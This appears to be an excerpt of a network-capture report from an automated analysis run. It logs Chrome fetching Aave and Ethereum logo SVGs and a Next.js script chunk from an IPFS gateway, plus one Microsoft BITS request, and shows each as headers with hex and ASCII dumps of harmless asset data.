                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 30 2c 6c 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 29 28 6a 2c 68 28 68 28 7b 7d 2c 6e 29 2c 7b 7d 2c 7b 6b 65 79 3a 65 2c 73 79 6d 62 6f 6c 3a 65 2c 73 78 3a 68 28 7b 6d 6c 3a 30 3d 3d 3d 74 3f 30 3a 22 63 61 6c 63 28 2d 31 20 2a 20 30 2e 35 65 6d 29 22 7d 2c 6e 2e 73 78 29 7d 29 29 7d 29 29 7d 29 3a 28 30 2c 64 2e 6a 73 78 29 28 61 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 69 6e 6c 69 6e 65 2d 66 6c 65 78 22 2c 70 6f 73 69 74 69 6f 6e 3a 22 72 65 6c 61 74 69 76 65 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 74 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 30 2c 6c 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 29 28 6a 2c 68 28 68 28 7b 7d 2c 6e 29 2c 7b 7d
                                                                                                                                                                                                                                                  Data Ascii: (function(e,t){return(0,l.createElement)(j,h(h({},n),{},{key:e,symbol:e,sx:h({ml:0===t?0:"calc(-1 * 0.5em)"},n.sx)}))}))}):(0,d.jsx)(a.Z,{sx:{display:"inline-flex",position:"relative"},children:t.map((function(e,t){return(0,l.createElement)(j,h(h({},n),{}


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  30192.168.2.549744209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC472OUTGET /aaveLogo.svg HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1201INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:42 GMT
                                                                                                                                                                                                                                                  Content-Type: image/svg+xml
                                                                                                                                                                                                                                                  Content-Length: 2978
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreievo5k5yvqt4mcghuabr4ky5nilodbjahhraupado3h7hwgwzrbsq"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/aaveLogo.svg
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafkreievo5k5yvqt4mcghuabr4ky5nilodbjahhraupado3h7hwgwzrbsq
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-03
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 73296
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8ca0e4147ec519e7-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC168INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 77 69 64 74 68 3d 22 37 31 2e 39 38 39 22 20 68 65 69 67 68 74 3d 22 32 30 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 47 72 6f 75 70 20 31 33 38 35 39 22 3e 3c 64 65 66 73 3e 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 61 22 20 78 31 3d 22 2d
                                                                                                                                                                                                                                                  Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="71.989" height="20" data-name="Group 13859"><defs><linearGradient id="a" x1="-
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 31 2e 39 39 39 22 20 78 32 3d 22 31 2e 39 36 32 22 20 79 31 3d 22 31 2e 30 33 34 22 20 79 32 3d 22 2e 31 31 32 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 6f 62 6a 65 63 74 42 6f 75 6e 64 69 6e 67 42 6f 78 22 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 33 30 62 61 63 36 22 2f 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 36 35 30 39 65 22 2f 3e 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 62 22 20 78 31 3d 22 2d 34 2e 30 34 38 22 20 78 32 3d 22 31 2e 31 38 31 22 20 79 31 3d 22 31 2e 33 31 35 22 20 79 32 3d 22 2e 33 37 39 22 20 78 6c 69 6e 6b 3a 68 72 65 66 3d 22 23 61 22 2f 3e 3c 6c 69
                                                                                                                                                                                                                                                  Data Ascii: 1.999" x2="1.962" y1="1.034" y2=".112" gradientUnits="objectBoundingBox"><stop offset="0" stop-color="#30bac6"/><stop offset="1" stop-color="#b6509e"/></linearGradient><linearGradient id="b" x1="-4.048" x2="1.181" y1="1.315" y2=".379" xlink:href="#a"/><li
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 20 30 20 30 20 31 20 2e 33 36 2e 38 35 37 20 31 2e 30 38 39 20 31 2e 30 38 39 20 30 20 30 20 31 2d 2e 33 36 2e 38 34 20 31 2e 32 20 31 2e 32 20 30 20 30 20 31 2d 2e 38 35 37 2e 33 34 33 68 2d 31 31 2e 33 33 32 61 31 2e 31 32 20 31 2e 31 32 20 30 20 30 20 31 2d 2e 39 30 38 2d 2e 33 36 32 7a 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 50 61 74 68 20 32 34 33 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 38 33 2e 35 32 33 20 2d 2e 36 36 33 29 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 75 72 6c 28 23 63 29 22 20 64 3d 22 4d 31 34 31 2e 39 36 34 20 31 38 2e 32 31 38 20 31 33 34 2e 39 39 20 31 2e 33 61 31 2e 38 37 36 20 31 2e 38 37 36 20 30 20 30 20 30 2d 31 2e 37 34 38 2d 31 2e 33 68 2d 2e 36 31 37 61 31 2e 38 37 36 20 31 2e 38 37
                                                                                                                                                                                                                                                  Data Ascii: 0 0 1 .36.857 1.089 1.089 0 0 1-.36.84 1.2 1.2 0 0 1-.857.343h-11.332a1.12 1.12 0 0 1-.908-.362z" data-name="Path 2432" transform="translate(-283.523 -.663)"/><path fill="url(#c)" d="M141.964 18.218 134.99 1.3a1.876 1.876 0 0 0-1.748-1.3h-.617a1.876 1.87
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC72INData Raw: 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 50 61 74 68 20 32 34 33 34 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 2e 32 29 22 2f 3e 3c 2f 67 3e 3c 2f 67 3e 3c 2f 67 3e 3c 2f 73 76 67 3e 0a
                                                                                                                                                                                                                                                  Data Ascii: " data-name="Path 2434" transform="translate(-2.2)"/></g></g></g></svg>


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  31192.168.2.549743209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC487OUTGET /icons/networks/ethereum.svg HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1366INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:42 GMT
                                                                                                                                                                                                                                                  Content-Type: image/svg+xml
                                                                                                                                                                                                                                                  Content-Length: 6321
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreia3vt3hz4kt5ui56n2qsei6qu5zfqe6f4k24jotauvdwvioq7xhza"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/icons/networks/ethereum.svg
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeig3gyfey2cvkgtdeyklommqqwwsiwdiuxrnhyhxqmdojzxzf2p22a,bafybeihvadgjlbkifvoyhws7wx5l7tscpcnsvgny6bzcsirgr6kuoegc4y,bafkreia3vt3hz4kt5ui56n2qsei6qu5zfqe6f4k24jotauvdwvioq7xhza
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-03
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 73296
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8ca0e414792572c2-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC3INData Raw: 3c 73 76
                                                                                                                                                                                                                                                  Data Ascii: <sv
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 67 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 75 72 6c 28 23 61 29 22 20 64 3d 22 4d 30 20 30 68 32 34 76 32 34 48 30 7a 22 2f 3e 3c 64 65 66 73 3e 3c 70 61 74 74 65 72 6e 20 69 64 3d 22 61 22 20 70 61 74 74 65 72 6e 43 6f 6e 74 65 6e 74 55 6e 69 74 73 3d 22 6f 62 6a 65 63 74 42 6f 75 6e 64 69 6e 67 42 6f 78 22 20 77 69 64 74 68 3d 22 31 22 20 68 65 69 67 68 74 3d 22 31 22 3e 3c 75 73 65 20 78 6c 69 6e 6b 3a 68 72 65 66 3d 22
                                                                                                                                                                                                                                                  Data Ascii: g width="24" height="24" fill="none" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><path fill="url(#a)" d="M0 0h24v24H0z"/><defs><pattern id="a" patternContentUnits="objectBoundingBox" width="1" height="1"><use xlink:href="
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 45 41 45 49 34 7a 49 76 75 30 32 41 6c 71 6b 70 44 54 34 66 2f 43 31 44 34 78 7a 38 4d 41 46 41 67 6d 56 50 6a 78 70 46 41 73 69 2b 74 4e 34 42 37 2b 63 62 31 74 57 37 39 31 48 4b 78 69 39 63 69 53 58 41 33 73 4f 54 44 49 31 44 6e 79 77 6d 2f 4d 39 32 45 54 73 2f 54 74 41 63 35 44 46 4c 57 41 65 50 31 36 2b 43 48 36 55 42 6f 41 57 65 33 6e 48 65 4b 41 4b 41 70 4d 41 69 33 34 70 64 6b 6c 70 7a 65 4e 63 73 64 36 31 6c 7a 34 79 79 52 71 4d 68 4a 51 42 49 38 4d 41 54 4a 6a 55 49 55 51 68 70 6f 32 50 44 78 6a 44 73 6d 44 61 32 33 2b 30 53 39 74 33 5a 6d 52 62 77 34 7a 51 41 43 4c 42 72 33 77 56 6d 4f 57 5a 70 4e 32 41 43 62 43 52 6c 4e 39 74 6c 62 74 49 31 30 4b 71 48 46 6e 37 55 46 75 77 46 41 50 6a 67 62 2b 58 57 6d 6e 6c 56 67 55 30 4f 46 57 70 4b 68 71 33
                                                                                                                                                                                                                                                  Data Ascii: EAEI4zIvu02AlqkpDT4f/C1D4xz8MAFAgmVPjxpFAsi+tN4B7+cb1tW791HKxi9ciSXA3sOTDI1Dnywm/M92ETs/TtAc5DFLWAeP16+CH6UBoAWe3nHeKAKApMAi34pdklpzeNcsd61lz4yyRqMhJQBI8MATJjUIUQhpo2PDxjDsmDa23+0S9t3ZmRbw4zQACLBr3wVmOWZpN2ACbCRlN9tlbtI10KqHFn7UFuwFAPjgb+XWmnlVgU0OFWpKhq3
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 7a 55 41 46 6b 50 53 73 63 54 37 65 55 4c 2f 2b 6b 49 39 6e 62 45 6e 53 4a 71 78 38 53 76 73 79 47 63 58 32 30 41 47 41 66 77 66 34 67 4e 73 33 6e 6d 65 44 52 2b 5a 7a 45 77 45 74 46 64 2b 33 36 74 33 67 35 41 76 68 49 55 56 73 58 78 68 36 2f 68 2f 2b 4e 50 30 78 68 34 51 34 41 63 79 77 39 34 2f 58 6d 63 48 59 6c 53 37 44 33 37 77 66 2b 6e 47 55 66 62 55 77 42 69 44 61 37 6c 66 6f 74 50 38 62 39 36 6c 74 2f 63 51 73 4f 2b 79 62 4f 39 4f 48 59 46 48 6e 71 43 61 30 32 36 6e 76 70 31 69 2b 34 2f 4a 53 33 49 51 2b 4b 6a 39 56 64 74 71 44 48 56 36 47 67 4c 67 47 59 78 61 36 69 70 66 4c 49 6e 58 5a 62 6c 6b 75 59 34 5a 78 47 77 63 6c 4e 34 6b 32 2f 52 4d 67 33 33 36 31 53 57 32 37 30 4d 35 38 44 36 67 55 61 42 48 6e 56 75 78 70 63 5a 65 66 48 4f 63 49 61 43 55
                                                                                                                                                                                                                                                  Data Ascii: zUAFkPSscT7eUL/+kI9nbEnSJqx8SvsyGcX20AGAfwf4gNs3nmeDR+ZzEwEtFd+36t3g5AvhIUVsXxh6/h/+NP0xh4Q4Acyw94/XmcHYlS7D37wf+nGUfbUwBiDa7lfotP8b96lt/cQsO+ybO9OHYFHnqCa026nvp1i+4/JS3IQ+Kj9VdtqDHV6GgLgGYxa6ipfLInXZblkuY4ZxGwclN4k2/RMg3361SW270M58D6gUaBHnVuxpcZefHOcIaCU
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 51 42 48 6f 30 32 32 57 70 69 79 42 4d 69 6c 69 42 32 55 50 69 39 57 4b 6f 75 37 39 4b 62 4e 62 32 57 69 53 45 36 54 67 31 44 53 53 4c 56 56 74 38 41 6e 78 42 77 46 6c 58 78 73 34 4f 66 50 36 4a 37 68 67 45 4a 48 6f 73 49 67 50 61 46 69 69 73 58 32 67 4f 49 46 42 4a 4d 31 39 2b 48 61 37 6d 73 6b 5a 67 56 7a 44 54 50 74 30 77 4e 30 33 56 79 4b 4e 51 6d 6c 6e 69 4e 32 2b 41 42 4c 42 73 2f 67 50 44 52 38 6f 36 62 39 52 4e 46 41 48 54 72 2f 72 4a 53 50 6e 79 4c 74 67 44 69 41 76 68 67 68 2f 2f 52 56 64 56 31 42 62 4b 57 79 61 45 36 54 77 2b 48 54 37 35 6f 51 31 68 34 74 4c 4b 68 4d 55 51 6c 41 65 30 48 2b 4f 57 46 51 51 6f 54 41 49 31 51 32 52 52 76 64 46 45 78 43 31 67 32 46 76 48 45 43 33 70 36 41 37 64 4e 44 32 2b 32 41 2f 52 7a 44 67 57 67 36 44 61 70 68
                                                                                                                                                                                                                                                  Data Ascii: QBHo022WpiyBMiliB2UPi9WKou79KbNb2WiSE6Tg1DSSLVVt8AnxBwFlXxs4OfP6J7hgEJHosIgPaFiisX2gOIFBJM19+Ha7mskZgVzDTPt0wN03VyKNQmlniN2+ABLBs/gPDR8o6b9RNFAHTr/rJSPnyLtgDiAvhgh//RVdV1BbKWyaE6Tw+HT75oQ1h4tLKhMUQlAe0H+OWFQQoTAI1Q2RRvdFExC1g2FvHEC3p6A7dND2+2A/RzDgWg6Daph
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC842INData Raw: 68 44 66 30 6d 63 6f 70 6b 44 41 79 41 52 57 46 41 69 78 4b 47 4b 33 6e 46 6f 53 4f 69 44 4f 70 30 4c 65 78 46 46 43 61 41 4f 64 34 39 73 37 30 69 68 34 35 45 72 67 51 75 41 69 33 76 61 35 56 2b 75 73 43 79 36 58 47 64 67 42 62 6c 70 54 2f 67 52 52 51 6d 41 4d 4b 39 69 4a 37 56 36 52 71 58 65 54 39 64 6b 44 65 65 71 64 4a 62 36 45 37 63 57 4c 48 70 4b 5a 30 45 4a 4d 6f 4c 70 6d 78 6a 43 78 49 41 4d 34 39 45 7a 2b 68 31 6a 5a 36 43 7a 46 4f 42 56 64 52 44 56 6d 2f 74 46 6c 4e 49 34 48 73 52 2b 51 51 77 79 62 73 48 4d 6f 61 73 69 38 49 78 55 37 70 67 70 53 6e 56 41 65 62 74 49 2b 49 49 76 48 74 55 67 6b 44 6f 6f 41 45 67 57 2b 31 4b 66 70 67 78 61 42 4f 59 30 6a 44 45 50 44 35 45 38 64 49 42 58 47 6b 65 30 4e 6a 57 70 63 34 50 67 78 34 2b 35 68 4e 4e 44 65
                                                                                                                                                                                                                                                  Data Ascii: hDf0mcopkDAyARWFAixKGK3nFoSOiDOp0LexFFCaAOd49s70ih45ErgQuAi3va5V+usCy6XGdgBblpT/gRRQmAMK9iJ7V6RqXeT9dkDeeqdJb6E7cWLHpKZ0EJMoLpmxjCxIAM49Ez+h1jZ6CzFOBVdRDVm/tFlNI4HsR+QQwybsHMoasi8IxU7pgpSnVAebtI+IIvHtUgkDooAEgW+1KfpgxaBOY0jDEPD5E8dIBXGke0NjWpc4Pgx4+5hNNDe


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  32192.168.2.549736184.28.90.27443
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                  User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                  Host: fs.microsoft.com
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC467INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                  Server: ECAcc (lpl/EF67)
                                                                                                                                                                                                                                                  X-CID: 11
                                                                                                                                                                                                                                                  X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                  X-Ms-Region: prod-neu-z1
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=218000
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:42 GMT
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  X-CID: 2


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  33192.168.2.549745209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC739OUTGET /_next/static/chunks/1226.2b4574c57c2b36b6.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:42 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 17588
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreievfxvb3qpn3jq3m33ypqfruljj6ensexvrqm5xdzq4ywxv57gpxe"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/1226.2b4574c57c2b36b6.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreievfxvb3qpn3jq3m33ypqfruljj6ensexvrqm5xdzq4ywxv57gpxe
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-02
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028475
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 31 37 61 61 35 34 34 33 62 32 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e417aa5443b2-EWR
